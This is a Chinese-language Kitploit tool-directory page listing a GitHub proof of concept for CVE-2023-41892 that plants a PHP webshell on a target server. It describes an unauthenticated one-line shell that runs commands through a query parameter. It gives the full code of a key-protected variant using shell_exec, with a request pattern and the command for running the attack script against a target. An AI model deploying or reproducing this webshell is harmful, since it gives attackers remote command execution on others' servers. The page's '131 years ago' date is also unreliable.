Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-41892_poc — 为我自己使用定制了这个 | Kitploit
工具/GitHubGitHub/user01-1/cve-2023-41892_poc
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用命令与控制
GitHubuser01-1/cve-2023-41892_poc

CVE-2023-41892_poc

为我自己使用定制了这个

查看仓库
131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-41892_poc

为个人使用定制此工具

poc_noauth.py

  • 基础 PHP 一句话 webshell
  • 通过 ?cmd=<命令> 执行 OS 命令

poc_auth.py

  • 添加了简单密钥认证的 webshell(SHA-256 哈希比对方式)
  • 只有输入正确的密钥才能执行命令
  • 需要修改代码:
    • 将 drop_payload 函数内部的 webshell 变量中的 YOUR_SECRET_KEY 部分替换为所需密钥的 SHA-256 哈希值
  • 使用方法:
    1. 将 webshell 中的 YOUR_SECRET_KEY 替换为明文密钥的 SHA-256 哈希值
    2. 请求时传递明文密钥
      {target}/shell.php?k=<明文密钥>&c=<命令>
      
  • 示例:
    1. 设置:明文密钥 = test1234
    2. 通过 cyberchef 等进行 SHA256 哈希:937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244
      • echo -n test1234 | sha256sum
      • cyberchef 等
    3. 修改代码:
      webshell = """<?php const K='937e8d5fbb48bd4949536cd65b8d35c426b80d2f830c5c308e2cdec422ae2244';if(hash('sha256',$_GET['k']??'')!==K)die; if(isset($_GET['c']))echo'<pre>'.shell_exec($_GET['c']); ?>"""
      

使用方法

python poc_noauth.py {目标}

下载工具